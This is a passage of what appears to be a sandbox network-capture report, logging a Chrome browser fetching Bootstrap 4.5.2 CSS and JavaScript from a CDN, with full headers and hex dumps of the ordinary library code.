                          Accept: text/css,*/*;q=0.1
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: style
                          Referer: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-24 23:00:31 UTC954INHTTP/1.1 200 OK
                          Date: Fri, 24 May 2024 23:00:31 GMT
                          Content-Type: text/css; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Vary: Accept-Encoding
                          CDN-PullZone: 252412
                          CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                          CDN-RequestCountryCode: US
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=31919000
                          ETag: W/"816af0eddd3b4822c2756227c7e7b7ee"
                          Last-Modified: Mon, 25 Jan 2021 22:04:11 GMT
                          CDN-ProxyVer: 1.04
                          CDN-RequestPullSuccess: True
                          CDN-RequestPullCode: 200
                          CDN-CachedAt: 04/04/2024 23:51:13
                          CDN-EdgeStorageId: 1067
                          timing-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          X-Content-Type-Options: nosniff
                          CDN-Status: 200
                          CDN-RequestId: 4b2d8cd4867b010ac26dbc38c560c41a
                          CDN-Cache: HIT
                          CF-Cache-Status: HIT
                          Age: 43021
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Server: cloudflare
                          CF-RAY: 8890e6ff6bc3c45c-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-24 23:00:31 UTC415INData Raw: 37 62 66 38 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 35 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 66
                          Data Ascii: 7bf8/*! * Bootstrap v4.5.2 (https://getbootstrap.com/) * Copyright 2011-2020 The Bootstrap Authors * Copyright 2011-2020 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--blue:#007bff;--indigo:#6610f
                          2024-05-24 23:00:31 UTC1369INData Raw: 61 79 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 70 72 69 6d 61 72 79 3a 23 30 30 37 62 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32
                          Data Ascii: ay-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:12
                          2024-05-24 23:00:31 UTC1369INData Raw: 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f
                          Data Ascii: t-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bo
                          2024-05-24 23:00:31 UTC1369INData Raw: 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 72 6f 6c 65 3d 62 75 74 74 6f 6e 5d 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 73 65 6c 65 63 74 7b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 5b 74 79 70 65
                          Data Ascii: to -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}[type
                          2024-05-24 23:00:31 UTC1369INData Raw: 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 64 69 73 70 6c
                          Data Ascii: h2,h3,h4,h5,h6{margin-bottom:.5rem;font-weight:500;line-height:1.2}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25rem;font-weight:300}.displ
                          2024-05-24 23:00:31 UTC1369INData Raw: 63 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 72 65 6d 7d 6b 62 64 20 6b 62 64 7b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 70 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 7d 70 72 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65
                          Data Ascii: c;word-wrap:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;background-color:#212529;border-radius:.2rem}kbd kbd{padding:0;font-size:100%;font-weight:700}pre{display:block;font-size:87.5%;color:#212529}pre code{font-size
                          2024-05-24 23:00:31 UTC1369INData Raw: 6f 6c 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d 35 2c 2e 63 6f 6c 2d 73 6d 2d 36 2c 2e 63 6f 6c 2d 73 6d 2d 37 2c 2e 63 6f 6c 2d 73 6d 2d 38 2c 2e 63 6f 6c 2d 73 6d 2d 39 2c 2e 63 6f 6c 2d 73 6d 2d 61 75 74
                          Data Ascii: ol-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-aut
                          2024-05-24 23:00:31 UTC1369INData Raw: 78 3a 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 63 6f 6c 2d 37 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 38 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 39 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 31 30 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33
                          Data Ascii: x:0 0 50%;flex:0 0 50%;max-width:50%}.col-7{-ms-flex:0 0 58.333333%;flex:0 0 58.333333%;max-width:58.333333%}.col-8{-ms-flex:0 0 66.666667%;flex:0 0 66.666667%;max-width:66.666667%}.col-9{-ms-flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-10{-ms-flex:0 0 83
                          2024-05-24 23:00:31 UTC1369INData Raw: 2d 62 61 73 69 73 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 70 6f 73 69 74 69 76 65 3a 31 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 31 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 32 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 33 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 33 33 2e
                          Data Ascii: -basis:0;-ms-flex-positive:1;flex-grow:1;max-width:100%}.row-cols-sm-1>*{-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.row-cols-sm-2>*{-ms-flex:0 0 50%;flex:0 0 50%;max-width:50%}.row-cols-sm-3>*{-ms-flex:0 0 33.333333%;flex:0 0 33.333333%;max-width:33.
                          2024-05-24 23:00:31 UTC1369INData Raw: 72 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 6c 61 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 73 6d 2d 30 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e 6f 72 64 65 72 2d 73 6d 2d 31 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 3b 6f 72 64 65 72 3a 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 32 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 32 3b 6f 72 64 65 72 3a 32 7d 2e 6f 72 64 65 72 2d 73 6d 2d 33 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 33 3b 6f 72 64 65 72 3a 33 7d 2e 6f 72 64 65 72 2d 73 6d 2d 34 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 34 3b 6f 72 64 65 72
                          Data Ascii: rst{-ms-flex-order:-1;order:-1}.order-sm-last{-ms-flex-order:13;order:13}.order-sm-0{-ms-flex-order:0;order:0}.order-sm-1{-ms-flex-order:1;order:1}.order-sm-2{-ms-flex-order:2;order:2}.order-sm-3{-ms-flex-order:3;order:3}.order-sm-4{-ms-flex-order:4;order


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.649715104.18.10.2074432064C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-24 23:00:31 UTC650OUTGET /bootstrap/4.5.2/js/bootstrap.min.js HTTP/1.1
                          Host: stackpath.bootstrapcdn.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: script
                          Referer: https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-24 23:00:31 UTC968INHTTP/1.1 200 OK
                          Date: Fri, 24 May 2024 23:00:31 GMT
                          Content-Type: application/javascript; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Vary: Accept-Encoding
                          CDN-PullZone: 252412
                          CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                          CDN-RequestCountryCode: US
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=31919000
                          ETag: W/"02d223393e00c273efdcb1ade8f4f8b1"
                          Last-Modified: Mon, 25 Jan 2021 22:04:11 GMT
                          CDN-ProxyVer: 1.04
                          CDN-RequestPullSuccess: True
                          CDN-RequestPullCode: 200
                          CDN-CachedAt: 03/18/2024 12:05:28
                          CDN-EdgeStorageId: 1070
                          timing-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          X-Content-Type-Options: nosniff
                          CDN-Status: 200
                          CDN-RequestId: 93b2905365a3892bd55f7be2d8177a9f
                          CDN-Cache: HIT
                          CF-Cache-Status: HIT
                          Age: 43021
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Server: cloudflare
                          CF-RAY: 8890e6ff78967c90-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-24 23:00:31 UTC401INData Raw: 37 62 65 62 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 35 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c
                          Data Ascii: 7beb/*! * Bootstrap v4.5.2 (https://getbootstrap.com/) * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,
                          2024-05-24 23:00:31 UTC1369INData Raw: 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 7c 7c 73 65 6c 66 29 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e
                          Data Ascii: fine(["exports","jquery","popper.js"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery,t.Popper)}(this,(function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.con
                          2024-05-24 23:00:31 UTC1369INData Raw: 6c 6f 61 74 28 69 29 3b 72 65 74 75 72 6e 20 6f 7c 7c 73 3f 28 6e 3d 6e 2e 73 70 6c 69 74 28 22 2c 22 29 5b 30 5d 2c 69 3d 69 2e 73 70 6c 69 74 28 22 2c 22 29 5b 30 5d 2c 31 65 33 2a 28 70 61 72 73 65 46 6c 6f 61 74 28 6e 29 2b 70 61 72 73 65 46 6c 6f 61 74 28 69 29 29 29 3a 30 7d 2c 72 65 66 6c 6f 77 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7d 2c 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 28 74 29 2e 74 72 69 67 67 65 72 28 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 22 74 72 61 6e 73
                          Data Ascii: loat(i);return o||s?(n=n.split(",")[0],i=i.split(",")[0],1e3*(parseFloat(n)+parseFloat(i))):0},reflow:function(t){return t.offsetHeight},triggerTransitionEnd:function(t){e(t).trigger("transitionend")},supportsTransitionEnd:function(){return Boolean("trans
                          2024-05-24 23:00:31 UTC1369INData Raw: 74 2e 73 70 65 63 69 61 6c 5b 61 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 5d 3d 7b 62 69 6e 64 54 79 70 65 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 64 65 6c 65 67 61 74 65 54 79 70 65 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 68 61 6e 64 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 28 74 2e 74 61 72 67 65 74 29 2e 69 73 28 74 68 69 73 29 29 72 65 74 75 72 6e 20 74 2e 68 61 6e 64 6c 65 4f 62 6a 2e 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 3b 76 61 72 20 6c 3d 22 61 6c 65 72 74 22 2c 63 3d 65 2e 66 6e 5b 6c 5d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 6e 3d 74 2e 70 72 6f
                          Data Ascii: t.special[a.TRANSITION_END]={bindType:"transitionend",delegateType:"transitionend",handle:function(t){if(e(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}};var l="alert",c=e.fn[l],h=function(){function t(t){this._element=t}var n=t.pro
                          2024-05-24 23:00:31 UTC1369INData Raw: 35 2e 32 22 7d 7d 5d 29 2c 74 7d 28 29 3b 65 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 62 73 2e 61 6c 65 72 74 2e 64 61 74 61 2d 61 70 69 22 2c 27 5b 64 61 74 61 2d 64 69 73 6d 69 73 73 3d 22 61 6c 65 72 74 22 5d 27 2c 68 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 68 29 29 2c 65 2e 66 6e 5b 6c 5d 3d 68 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 65 2e 66 6e 5b 6c 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 68 2c 65 2e 66 6e 5b 6c 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 66 6e 5b 6c 5d 3d 63 2c 68 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 3b 76 61 72 20 75 3d 65 2e 66 6e 2e 62 75 74 74 6f 6e 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e
                          Data Ascii: 5.2"}}]),t}();e(document).on("click.bs.alert.data-api",'[data-dismiss="alert"]',h._handleDismiss(new h)),e.fn[l]=h._jQueryInterface,e.fn[l].Constructor=h,e.fn[l].noConflict=function(){return e.fn[l]=c,h._jQueryInterface};var u=e.fn.button,d=function(){fun
                          2024-05-24 23:00:31 UTC1369INData Raw: 28 74 29 7b 76 61 72 20 6e 3d 74 2e 74 61 72 67 65 74 2c 69 3d 6e 3b 69 66 28 65 28 6e 29 2e 68 61 73 43 6c 61 73 73 28 22 62 74 6e 22 29 7c 7c 28 6e 3d 65 28 6e 29 2e 63 6c 6f 73 65 73 74 28 22 2e 62 74 6e 22 29 5b 30 5d 29 2c 21 6e 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 65 6c 73 65 7b 76 61 72 20 6f 3d 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 69 6e 70 75 74 3a 6e 6f 74 28 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 29 27 29 3b 69 66 28 6f 26 26 28 6f 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6f 2e 63
                          Data Ascii: (t){var n=t.target,i=n;if(e(n).hasClass("btn")||(n=e(n).closest(".btn")[0]),!n||n.hasAttribute("disabled")||n.classList.contains("disabled"))t.preventDefault();else{var o=n.querySelector('input:not([type="hidden"])');if(o&&(o.hasAttribute("disabled")||o.c
